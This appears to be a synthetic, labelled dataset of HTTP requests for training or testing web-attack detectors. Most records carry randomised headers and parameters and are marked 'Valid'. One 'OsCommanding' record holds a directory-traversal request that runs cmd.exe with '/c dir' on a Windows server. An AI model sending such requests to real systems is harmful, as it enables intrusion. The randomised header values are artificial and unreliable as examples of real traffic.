Host: 144.220.248.159:80
Connection: close
Accept: text/html;q=0.4, audio/basic;q=0.2
Accept-Charset: iso-8859-4;q=0.4, iso-10646-ucs-2, iso-8859-6, iso-8859-9, windows-1255;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: c-nlna, oesLnsl-u, h-sOtsdrf;q=0.1, utetjmu-enQs6s0;q=0.6
Cache-Control: only-if-cached
Client-ip: 60.102.82.20
Cookie: uqnfoAE0ooq=36979861;2p=8echoe5s\ae
Cookie2: $Version="049"
Date: Fri, 17 Feb 06 01:11:14 UTC
ETag: W/"u4k2U1SQ_x00WBC1Jp"
Expect: ttrhbztf
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Wed, 20 Apr 05 01:08:12 CET
If-Unmodified-Since: Mon, 17 Nov 08 23:21:18 UTC
If-Match: "zndjQbm6CAuv2DpY8"
If-None-Match: *
If-Range: "jH.HSSGdokJL@Wxsx"
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Digest algorithm=MD5
Range: -4
Referer: http://www.7e5oE.biz/6h6oTe/l2dh1t/qrtti/ednI.pdf
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.2 (X11; U; Linux i386 9.1; hn-yv; rv:4.4.1) Gecko/20419719
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7677x541
Via: 2.0 129.42.145.227:41, 8.4 www.yin12Eio.css, 8.8 www.de7rrn.html:10207
Transfer-Encoding: deflate
Upgrade: uohtr/6.5, oeo/0.4
Warning: 764 76.214.33.91 "Rbeodtq" "Fri, 19 Mar 04 18:10:47 GMT"
X-Forwarded-For: 32.32.219.84
X-Serial-Number: 54708069609443708
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41066
Start - Id: 30356
class: Valid
GET /n4A3Ox/hnaaniAh7qoioa5/saef1lhpts/17ubr6au/vYfUaqI/dideda9oirsebl/ssteeealn/a82utL2nx/syhe/ohFVumxwsf5k41kug/eesngerthoha/aImeCFdkn6neyfnn1i.jsp?tt=35287&schvrnAeeod=3hiro4A&LmoQaiqctaau=hzl&m2wrq=Tr8mlhSusrTRap%3D%3Ax&ulniuc0ui6t=tne-iusrri%27yanarub&mwindow.openNTnetcat0dM=3180605&O3seliihwsdtirY=6093687&yegumo3ikn=544547946&etnndhe5icd=788178177&Cec9aoarEpi=rlipnyds%2Bwne&Qv6having=Cbndtl01-K%24+taneselect&yktih2ytUSu4ls=+%3Eeun8qCer4etrbgsound%7Ctcs+&ipbautSynfVr=Ea+t&tebacvDr7rotat1=Dp+ HTTP/1.0
Host: 63.92.91.169
Connection: keep-alive
Accept: application/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.7
Cache-Control: ty5fr='A7eee7te'
Client-ip: 46.149.252.32
Cookie: etAyojTne7rw=052;Ga3shutdownLa=oiyd9vohx
Cookie2: $Version="6"
Date: Sun, 07 Sep 08 16:05:34 CET
ETag: "qF4E9R6gaMKAgEM"
Expect: 100-continue
From: aaS7di@esk6nosXr.cz
If-Modified-Since: Thu, 14 May 09 16:10:48 CET
If-Unmodified-Since: Mon, 28 Nov 05 02:35:16 CET
If-Match: *
If-None-Match: "eQXWwq@fapxIU8Iok0x"
If-Range: "D8RLbRU1DfmMwodXwm"
Max-Forwards: 586
MIME-Version: 6.0
Pragma: ladegi=oet6e
Proxy-Authorization: NTLM ZHdvbWdUdGVvbnNuZWhtTW51Z3MxdGRubTZMdG9DcklyVGV0aHNiZ25raGV1cmhj
Authorization: Digest cnonce="utiL4p"
Range: 05745-,56-61
Referer: /Fineoi/hgehrn1/aortot.wmn
TE: chunked,gzip;q=0.0,chunked;q=0.4
Trailer: If-Range
User-Agent: Mozilla/0.9 (X11; U; Solaris 1.8; ds-ss; rv:0.5.3) Gecko/77797144
UA-CPU: PowerPC
UA-Disp: 011,976,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 033x3612
Via: 7.0 179.136.61.203
Transfer-Encoding: deflate
Upgrade: 8Sts/0.3
Warning: 632 www.rTe2l.html "hcd9dnnAbmuvu5it" "Sun, 10 Sep 06 21:36:43 GMT"
X-Forwarded-For: 179.94.180.111
X-Serial-Number: 4261996881393
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30356
Start - Id: 32691
class: Valid
PUT /euunz/dYJMIYR/tKornnd/cV7jrAL04sRBKV/m7neagaG/TEDnkrPHsseeu1it/pzy1hdwstbe/i@fuXc6KrV.png? HTTP/1.1
Content-Length: 150
Content-Language: erntRt
Content-Encoding: deflate
Content-Location: /oeqa.doc
Content-MD5: bk0yNnJzZGd0ZGV3Y2dpbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 22 Jan 08 20:17:01 UTC
Last-Modified: Sat, 01 Dec 07 09:33:46 UTC
Host: www.45gelLoob.it:4929
Connection: ePhe
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 5rneeEl-n7e
Cache-Control: only-if-cached
Client-ip: 174.130.90.151
Cookie: tes3amlyrt=324;cethue2xsoubt1h=3Ottmp$ft vtta[s;tpssizr5in7=e;oaesorzna=a2dasm Au[;enss1pLibr5te=74
Cookie2: $Version="68"
Date: Fri, 11 Apr 08 05:45:27 CET
ETag: "9.Ngsz0IUt3oZmuQJx9"
Expect: poFmtt=tloiG1;s7auea=qjnzhO
From: ehmije@nnt84tTw.st
If-Modified-Since: Wed, 26 Mar 08 12:55:26 GMT
If-Unmodified-Since: Tue, 04 Jan 05 04:57:29 UTC
If-Match: *
If-None-Match: *
If-Range: "Z8bcx0O.hZdqzNS"
Max-Forwards: 138
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: yotAi dzNn9sns=Ehauddd
Authorization: Basic d3JhdExvMUg6c3Rlcm8=
Range: 08-42,29612-1
Referer: /uret/ohiwnM/4ttaaoab/ArxnBas/1yoas.tiff
TE: trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/1.3 (Machintosh; U; Mac OS X 2.2; 7A-d9; rv:7.2.5) Gecko/10178135
UA-CPU: MIPS
UA-Disp: 4411,8999,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1210x8264
Via: 7.9 215.35.113.94, HTTP/2.6 55.105.73.124, 1.6 www.3obVceoR.htm
Transfer-Encoding: compress
Upgrade: ercu/0.8, 0hiEfa/9.7, iMd25D/0.0
Warning: 687 www.8e5n.png "aeAlftiesysisrs" "Mon, 22 Nov 04 04:04:45 CET"
X-Forwarded-For: 130.40.193.83
X-Serial-Number: 590618
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

euiaEosteh0leot=miaeslimjab&hAygroup byzaV=4&7tawbhsic=5&tistC=rmhohaslmeqialOy&03=eossetpssnunion&1i6iae=Tq>e9copye;iyoSunion4ehebnt&7nwtestn=868

End - Id: 32691
Start - Id: 30927
class: Valid
GET /trGz/gtt9sxofg/8sFzkKRsR9/dseMiJ5Xv3ZdPf22Pq-/uRes.asmx?OLN=06 HTTP/1.1
Host: 201.164.141.192
Connection: close
Accept: audio/basic;q=0.2, text/plain;q=0.0
Accept-Charset: windows-1253
Accept-Encoding: 
Accept-Language: tivbxht-jyh, parLspdt-hhIerrrk, mn-oju;q=0.1
Cache-Control: no-cache
Client-ip: 72.150.7.170
Cookie: ryoaees8rsa7=1;iFBzl='nh;hj=4plZ25;hmniedebed=221613;dD3hSrtiaaoah=h8re
Cookie2: $Version="301"
Date: Sat, 31 Jan 04 05:48:06 CET
ETag: "O@mBYC_ssvNwLkorZ"
Expect: 100-continue
From: eSAnM@ahoeenfee.biz
If-Modified-Since: Sat, 13 Jan 07 21:35:31 GMT
If-Unmodified-Since: Sun, 13 Jan 08 20:15:13 CET
If-Match: "2onAG7_KA5cD@Aags"
If-None-Match: "epJu2k7E2WD6ePRh-x"
If-Range: "TvXUzCLzjVDq8cYM"
Max-Forwards: 0321
MIME-Version: 0.3
Pragma: st='pTnh1dA'
Proxy-Authorization: Zw7ltl irs7a=wat2Do
Authorization: Basic aFR5RTFpaDpIODVjbGU=
Range: 8929-,26-
Referer: http://www.rispe.org/Wiompaeg/hyIuigi/eeinuo0h.dll
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.2 (compatible; seehc; Open BSD i386; tesme; ewumhinr4L)
UA-CPU: MIPS
UA-Disp: 0407,7003,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1031x1153
Via: 1.8 www.Eforetso.js:7
Transfer-Encoding: compress
Upgrade: A2lari/6.5, teu/8.0, nttot/3.7, errra/9.4, eaUpm/9.6
Warning: 528 150.223.116.32 "eiib2tvfathrBNuolv" 
X-Forwarded-For: 93.207.235.159
X-Serial-Number: 535265474092814212
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30927
Start - Id: 18481
class: Valid
GET /nitndwesqenmeEt2toG/xeho/hFeofEnrl/rM/I68rWEsXD/sjJHXa/tIvjG7@6cgQR/sf70epstjww6RhAry/VnzG.xrmail6EYfiu.asmx?z6KzfM9g=nt&e1r=iuSko&3winput4VgTblinkesc=0200926&ktstudwde3dz=979717&dhlnsowieWdeorn=eiframeanNnnodestntd+Twtmtaccept&ioHgef5=te&us=nxPynl&tcthidseis=etewedo4%3Ci HTTP/1.0
Host: 71.193.69.2:80
Connection: vtei
Accept: text/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: thhTeib='6'
Client-ip: 79.15.108.140
Cookie: ne0i8il8nfiIj6g=ul55odaeZg;hdrteestco4npei=7864484;ebek3od4=kTDnK._J;mnsdpsYre=deleteextermd<meg ]&j66qm
Cookie2: $Version="70"
Date: Wed, 11 Feb 09 04:25:08 UTC
ETag: W/"kcQq-97mGk7WVeND3ug"
Expect: tayi=x36Mg;nnrTte2o=iagdhNe
From: eocete@3mtoie.org
If-Modified-Since: Sat, 19 Sep 09 10:33:41 CET
If-Unmodified-Since: Sat, 17 Feb 07 08:12:25 GMT
If-Match: *
If-None-Match: *
If-Range: "p.oShulatXgoS1F"
Max-Forwards: 3
MIME-Version: 1.9
Pragma: i='i'
Proxy-Authorization: Basic aWVoVGh1ZXQ6YW9oaA==
Authorization: Digest cnonce="9Nlhaaeo"
Range: 7-,-428485,871762-
Referer: http://bohg.st/ieutstvt/vxio/rspa/o6NuW.msf
TE: chunked,trailers,trailers
Trailer: Trailer
User-Agent: ts1ie (tIhmxey4Gg; twc@pL)
UA-CPU: x86
UA-Disp: 1147,7434,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 934x751
Via: HTTP/3.2 www.11edmEi.png:4
Transfer-Encoding: gzip
Upgrade: obxu/3.0
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 194.234.50.19
X-Serial-Number: 63866719
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18481
Start - Id: 32689
class: Valid
PUT /ztZ9Bm@cXI/s99@FNuPb3@1QTwKz/le3nAhuOlccs/lzLNVghtacces3Ze@E7/e7el2u/ryt4heapqnbh6tyns/WvHNOnph-E2Giframe76_H/fKB3uaKoo4kTR/rmJEv/aI8.mspx? HTTP/1.0
Content-Length: 109
Content-Language: osyyix,aibcnIne
Content-Encoding: identity
Content-Location: /try0.jsp
Content-MD5: YWE2MGRzZWFpb3VldWRhaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Jun 05 09:39:24 GMT
Last-Modified: Thu, 19 Apr 07 14:20:50 GMT
Host: www.s7kBig.cz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 196.157.210.109
Cookie: tes3amlyrt=324;cethue2xsoubt1h=3Ottmp$ft vtta[s;tpssizr5in7=e;oaesorzna=a2dasm Au[;enss1pLibr5te=74
Cookie2: $Version="68"
Date: Wed, 07 Apr 10 15:31:35 UTC
ETag: W/"wqr0_qjGdgSGaE1Ir.8"
Expect: poFmtt=tloiG1;s7auea=qjnzhO
From: ehmije@nnt84tTw.st
If-Modified-Since: Tue, 11 Jan 05 08:18:26 CET
If-Unmodified-Since: Wed, 20 Oct 04 11:41:53 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 30 Mar 08 22:43:50 CET
Max-Forwards: 8
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: yotAi dzNn9sns=Ehauddd
Authorization: Basic dkxqaWx1ZTphcnRl
Range: 912858-831797,7147-,45-231351
Referer: /rtuem/oyds2/unw1aui/ieqnri.pdf
TE: trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/2.5 (compatible; MSIE 1.8; WinNT; Snctplsli; eorgqc; EnhtawY)
UA-CPU: MIPS
UA-Disp: 6556,232,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1210x8264
Via: 7.9 215.35.113.94, HTTP/2.6 55.105.73.124, 1.6 www.3obVceoR.htm
Transfer-Encoding: e6iB; tmmbrnnc=hEtmqcs
Upgrade: ercu/0.8, 0hiEfa/9.7, iMd25D/0.0
Warning: 696 84.193.51.16 "ch1tuoo" 
X-Forwarded-For: 130.40.193.83
X-Serial-Number: 590618
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4iqlutgnso=rjCQ&oudtqe=26&YOm44Mnetcat=dSBRsm&l4atvneQTEEr=8&b-JZ=287193&tuossp=93703&ayinlcuewfa9tr=eHbXb5wc

End - Id: 32689
Start - Id: 19915
class: Valid
GET /Lf2IgRr./ryf.3ouhcVok9Y/connectCa2L1TUsm/mthensOccon1sato/si78MVV8A2GF7Y4f4MA/ZEQrhb9ladeoenzO/libowlsKIKgO7/jioraOek/er-NQL_qIFFKf/o7servicesrWex/irlet9.js? HTTP/1.0
Host: 173.14.213.154
Connection: cwonef
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=0
Client-ip: 133.54.82.143
Cookie: aaiqribu=feieh@Ptioejnm;U3Ymdis0esrse=lZ r;eOiserilnarT=mailh8l2ae0&hE
Cookie2: $Version="958"
Date: Fri, 16 Oct 09 21:09:47 UTC
ETag: "cVzjY4J5nvzL3xt6l"
Expect: 100-continue
From: hneNgnvt@ijh5.org
If-Modified-Since: Sat, 26 Jan 08 22:38:30 UTC
If-Unmodified-Since: Thu, 07 Jul 05 03:23:08 UTC
If-Match: *
If-None-Match: "UA7V@xdQyVFJb.ul0"
If-Range: Fri, 14 Aug 09 12:16:08 UTC
Max-Forwards: 0
MIME-Version: 9.9
Pragma: 2irty='Etliy'
Proxy-Authorization: Basic UnNoZnU6YWVybG9jWW8=
Authorization: htpt nzKcRunr=aznays
Range: -8804
Referer: /pn5tosz2/hMutwgbz/eiPada.gz
TE: trailers,trailers,gzip
Trailer: Connection
User-Agent: eb-lPRArDH http://www.OsSsrr.st
UA-CPU: StrongARM
UA-Disp: 611,1277,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 205x6501
Via: tenoay/1.5 24.234.81.32:351, FTP/1.2 143.208.86.233, 4.1 www.nr3ia5.shtml
Transfer-Encoding: gzip
Upgrade: nofnHJ/3.3, Eo0/1.9, eex/2.7, dloapf/3.8
Warning: 431 103.132.199.19 "edesstaoetncjym5olrr" 
X-Forwarded-For: 43.150.154.249
X-Serial-Number: 52555
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19915
Start - Id: 2655
class: Valid
GET /aw/fuhqxcSTI/i9Ean/hggndts/Pltelnet4VM@i/sVTyO.php?ayoaRvnhIiia=nDjM&wm6motse3LmSxOr=it&re6eXgBtt3e=cAen&ihelrebietlD=honrptao6h&byt6=uiI&NE7y0GB=sahpa&td3oih=Otaieq&9-Du=eJx_x&atiPuclItweh=1haccess_loganiwget+h+&bCuIoiemctsae71=%5Burrw HTTP/1.0
Host: www.tHar.com:56
Connection: close
Accept: */*;q=0.0
Accept-Charset: windows-1257;q=0.4, iso-8859-1, iso-8859-15, iso-8859-5;q=0.9, shift_jis
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: noTg=aIjd
Client-ip: 133.198.3.102
Cookie: Sulgeaesr=719791;doaoA=l8letallr  1(;J-KuzDW@=369590
Cookie2: $Version="132"
Date: Thu, 14 Feb 08 23:47:15 CET
ETag: "S3xPaPK3W_0T2EyCNJF-"
Expect: tekxl=Fietn
From: utaldrtg@eo3ke.be
If-Modified-Since: Mon, 08 Sep 08 16:57:41 GMT
If-Unmodified-Since: Tue, 06 Feb 07 12:43:48 GMT
If-Match: *
If-None-Match: "dZ8_Sg_m9rs9l1iiBLR"
If-Range: "r1@vx.IchxYcCS9CE"
Max-Forwards: 9
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic YXNvdHNkT246b3JuZQ==
Range: 78017-732
Referer: /ynesrie/ekodsfre/ixsletEg/Slnpd.cfm
TE: trailers
Trailer: Accept-Charset
User-Agent: pseoye7 (hKt.cpb; aESgf4Lg; tCnKZ_; eNWH-YrD)
UA-CPU: x86
UA-Disp: 5435,722,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 834x080
Via: 4.0 www.tuta.html
Transfer-Encoding: gzip
Upgrade: YMots/9.9, 2loo/9.6, cgTcde/7.3, ltne1/8.2, mro0ot/2.9
Warning: 692 www.6ine.png "xa9d" "Fri, 03 Apr 09 06:38:55 UTC"
X-Forwarded-For: 196.188.242.124
X-Serial-Number: 8136074594585
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2655
Start - Id: 7747
class: Valid
PUT /3ele/5hfanshhnmo2/lvaneaabdmuox/d62nNtsyHebtt/3DokpvN7NvP/sCV5NiHAAt0v/aL1@xhh/mf4Oe2nit3o/fugDL/mbR0zb/c7Othr/im.css? HTTP/1.0
Content-Length: 74
Content-Language: auktde,sfotnT
Content-Encoding: compress
Content-Location: /9synei5i/Melss/aohiji.wav
Content-MD5: dGhhc2VvZHRoMGFvcmRyNA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 18 Jan 06 21:09:27 CET
Last-Modified: Tue, 15 Jul 08 07:58:21 UTC
Host: www.enTu.uk
Connection: close
Accept: text/*;q=0.7
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.3, gzip;q=0.9, deflate, compress;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 7.12.86.37
Cookie: 2likepYm=153;XKN4z_hTt=ap-
Cookie2: $Version="096"
Date: Mon, 25 Feb 08 17:07:25 CET
ETag: W/"tJ.mXVTM-c9@qNUQWD"
Expect: laoo4ohe
From: Issg@FSsymatcdn.biz
If-Modified-Since: Mon, 13 Dec 04 23:06:38 GMT
If-Unmodified-Since: Tue, 15 Aug 06 03:59:11 GMT
If-Match: "90Jfd_j5fmQrSmQ@2V9"
If-None-Match: "DYcIxDM2WKU0@gZuzfp"
If-Range: *
Max-Forwards: 35
MIME-Version: 9.2
Pragma: mree='u'
Proxy-Authorization: nlWd 2e8avieh=tri7nwl
Authorization: EnolD ibbep=m4fs0h4
Range: 176685-
Referer: /haans/bmndet/tdaj/SedS9d/hseAbd.pdf
TE: gzip,chunked,trailers
Trailer: Range
User-Agent: Mozilla/6.1 (compatible; ne6tphcliu; Open BSD i586; sciCzt; tihu0eV; aeOShqtlgh)
UA-CPU: PowerPC
UA-Disp: 0857,811,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2784x639
Via: ljrur/6.2 229.158.14.210, 0.0 www.neh5ia.tiff
Transfer-Encoding: compress
Upgrade: oboir/9.1, tneh/8.0, sslA/3.6, rePhmj/5.9, bsdgN/4.4
Warning: 810 141.222.234.142 "zmnweaewonEakBetbj" "Sat, 23 Jan 10 20:21:52 CET"
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 755834931599886
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

d7qgb%uDxaXDV=eJVY4MBpC8&0nues=aeyltlx&3bltNiaa=Ae8isuol&5whx238Uupdate=8a

End - Id: 7747
Start - Id: 3006
class: Valid
GET /lCQlE72BM/eRVxo41VQfMThHD/s-isuO-1lUx.shtml?giwaTSBpekfa=cisGrpeEailinkJe+t&rtt=0642401&zQ2c=i82_txYtu&zg1nj=dtorh&yasRdnhonmIenel=94006&mevcnaSs=nocKW1&hh=81&Su9=Rvif&brzzlGtudbbUy=e%25uc8 HTTP/1.0
Host: 83.48.166.89
Connection: h1d2yrnr
Accept: audio/*;q=0.6, video/*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: compress, identity;q=0.0, compress, gzip;q=0.0
Accept-Language: *;q=0.7
Cache-Control: max-age=75
Client-ip: 60.109.84.17
Cookie: orj1imm=e/1garscriptAPi he;acEoat=cde;a2e=491106;75tdAA=Os56eludf;yslu9uefuuEe=snr
Cookie2: $Version="186"
Date: Fri, 08 Jun 07 09:43:05 UTC
ETag: W/"oqgI8hu-id-K1uVS4C"
Expect: ibp2e=is0a1eiv
From: Gnrp@qqtreOp.fr
If-Modified-Since: Fri, 27 Nov 09 05:55:18 GMT
If-Unmodified-Since: Sun, 26 Nov 06 06:29:34 CET
If-Match: *
If-None-Match: *
If-Range: "KKW8xdbEkcszBu4akdEi"
Max-Forwards: 44
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM dWVPc1hsN3p3c2VUc3FXaG9FdGlnd2RuZTRlVWRsdGF0Zm90b2E=
Authorization: Digest nc=eB3E76Db
Range: 420-
Referer: http://www.cnahe.com/tc1iw/eneetnO.conf
TE: chunked;q=0.3,trailers,chunked
Trailer: Upgrade
User-Agent: aajldb (tX12PFqeA; h8ATyE)
UA-CPU: StrongARM
UA-Disp: 767,9233,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1039x612
Via: HTTP/8.7 26.164.12.130:3, 1.9 148.88.4.22, FTP/2.1 60.121.165.204
Transfer-Encoding: compress
Upgrade: nqsh/1.3, aaiIb/2.1, SylCe/2.6
Warning: 957 www.teI4r.tiff "iedey" "Wed, 16 Nov 05 14:19:51 UTC"
X-Forwarded-For: 191.50.240.235
X-Serial-Number: 39984855
----: --------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 3006
Start - Id: 36519
class: OsCommanding
GET /backup/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.mos7.uk:959
Connection: wli0r
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: li-OEen7;q=0.7, 8l-Aosef6o;q=0.3, n-gpi25i28;q=0.8
Cache-Control: min-fresh=741
Client-ip: 65.215.179.86
Cookie: meBo6xeieeseog=wowqmt;esaid73ol1ltc=22100;z8MiP6_=1uI1s23tuI;MmesteaE=94;8UB.V06iE=3\esASa
Cookie2: $Version="7"
Date: Wed, 06 Apr 05 22:05:10 UTC
ETag: W/"SUqEZhdabUnFaONcxFdw"
Expect: 100-continue
From: penb1st@ydtlidrwxO.uk
If-Modified-Since: Mon, 19 Jun 06 18:58:13 UTC
If-Unmodified-Since: Sat, 23 Jul 05 07:12:40 CET
If-Match: "@2hN50taAeHdG8U"
If-None-Match: "CNDAgVyjBN2GHE2o"
If-Range: *
Max-Forwards: 9
MIME-Version: 8.5
Pragma: osc6St=th
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: NTLM d3Jtb3RpbmVzY240ZWkwb09sYWhvYVRlcm5wZHRseWhlOGk=
Range: 17-
Referer: http://ooeeg.ch/aieraey/5msnosrb/liec.jsp
TE: deflate;q=0.8,gzip
Trailer: If-Modified-Since
User-Agent: dtsla (iox53hu; npNiAJok-)
UA-CPU: 68000
UA-Disp: 0316,285,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9877x8489
Via: 0.5 www.lskeobo.css, det6Oh/0.4 61.167.246.80, 3.4 171.12.239.130
Transfer-Encoding: deflate
Upgrade: r1teH/3.1, tnlo/6.6, Mbo1ue/5.1, faabak/8.4, hontz/8.0
Warning: 264 www.atriB3fe.css "fiechfo" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36519
Start - Id: 30565
class: Valid
GET /ro1goytlblosnsids.png?ZOPZ7e4lv=tosa%24ot1&etturh5YI=tR.yv55 HTTP/1.1
Host: 19.124.3.93
Connection: onclAt
Accept: */*;q=0.5
Accept-Charset: ks_c_5601-1987, windows-1252;q=0.6, cp-950
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: g1zn=Yxcd2a
Client-ip: 184.77.85.8
Cookie: ie2tys=r7dT;sdD=o6imaildcwinnteee8;nD0rMneTnl= id2\ote5hv exec7e-p
Cookie2: $Version="86"
Date: Wed, 06 Jul 05 15:39:03 UTC
ETag: "Ok7t5F6QL.skIabO"
Expect: 100-continue
From: fulner@n7m8d5nmt.de
If-Modified-Since: Sat, 04 Sep 04 23:28:28 UTC
If-Unmodified-Since: Mon, 06 Nov 06 19:35:23 UTC
If-Match: *
If-None-Match: "Lv_1_MrBPtLzjUG1L"
If-Range: Mon, 05 Dec 05 23:19:23 UTC
Max-Forwards: 508
MIME-Version: 1.2
Pragma: tb=0iUeamn
Proxy-Authorization: bdnfth iaisx=it1dntr
Authorization: NTLM d29lQWlucmZjbGx3cm9hdmFsb3JhMm1hb25oZWVEcGVpaXJSZmRlZTJ5dGdhVmw=
Range: 592356-588
Referer: /yrae/shy4Ua.conf
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: dSsrR0IYn http://www.e2eeim.fr
UA-CPU: 68000
UA-Disp: 537,7746,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 5611x433
Via: HTTP/8.6 64.242.5.167:994, 4.8 79.158.81.50, 0.5 143.50.212.102
Transfer-Encoding: deflate
Upgrade: na6t/6.4, tae/3.8, naci/7.4, eenr/4.3
Warning: 104 www.irai.tiff "s6aaiRf" 
X-Forwarded-For: 215.132.242.147
X-Serial-Number: 13347760723298878984
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30565
Start - Id: 33901
class: Valid
PUT /mZJicQx9d-9G/s5be0xg/0eFdpn2wa/iTieri1etov/eA_6OjutOvS72Xn/MdftpN8httpHV/Jhttps/b6dtgswuemnr7L/6includeEcMHIbgsoundposition2/eZktM3xztZf/idocttyrqcdo0.pl? HTTP/1.1
Content-Length: 58
Content-Language: 7zEe,Bf
Content-Encoding: gzip
Content-Location: http://eaiegar.st/dve4/hmuy/eercZ.bin
Content-MD5: ZGFwemRvb3BhVGlFaW94dw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 May 06 18:13:59 GMT
Last-Modified: Sat, 11 Jun 05 18:08:58 CET
Host: 120.51.234.202
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: Lgg-ccri, hy-edeeth;q=0.2, Xlenaw-usr;q=0.8
Cache-Control: only-if-cached
Client-ip: 79.8.5.10
Cookie: el3rose7dEhiq=haEi
Cookie2: $Version="187"
Date: Thu, 25 Mar 10 05:11:25 GMT
ETag: "yty6mQFBlm2dqjw"
Expect: kcer4ecw
From: tietc@t0ytt.net
If-Modified-Since: Mon, 30 Oct 06 09:50:43 CET
If-Unmodified-Since: Tue, 15 Sep 09 02:58:27 GMT
If-Match: "tNAX@b8OluPs7LKbSJlp"
If-None-Match: "icz-ICVgkrxkAtmMIZH"
If-Range: Sun, 19 Oct 08 11:15:50 CET
Max-Forwards: 7281
MIME-Version: 1.6
Pragma: rabgibv=tGrehtoa
Proxy-Authorization: Digest username="3htdpnp1"
Authorization: hCsu toftpss=rdgor8
Range: 7-
Referer: http://www.erEefk.be/or8tneo/w8ns7o/jinl/arjoBs.jpeg
TE: chunked;q=0.7
Trailer: Warning
User-Agent: y3weaoesb/3.3.3
UA-CPU: PowerPC
UA-Disp: 4653,644,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 1982x002
Via: HTTP/6.5 www.ugeem.tiff, tto/5.6 www.nmot.jpeg
Transfer-Encoding: compress
Upgrade: tiA/0.9, ntKsa/7.2, 7Aeetb/2.3, Eili/1.5, lni/0.9
Warning: 989 201.150.171.195 "ttyrApoieD4se" "Wed, 19 Aug 09 22:23:21 CET"
X-Forwarded-For: 7.63.26.112
X-Serial-Number: 6132370347859311136
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

kfnIxtermmiCx=ur&o6AeEoeueO=jy6xzT6R6Vq&z9dpgHher=50500381

End - Id: 33901
Start - Id: 13672
class: Valid
GET /sibq-5pp-ULvzF31D/pe.sh?Eeacseaedydath=8873&uoTerhte=Ydnwaeetb&nramayn=fpb%2Frc&3mc3tetry=rhoqe&wko=07369797&ebt6sdccctei=4&yuaGEV@havingcusrtI=1 HTTP/1.0
Host: 153.76.39.44
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=8131
Client-ip: 210.22.234.141
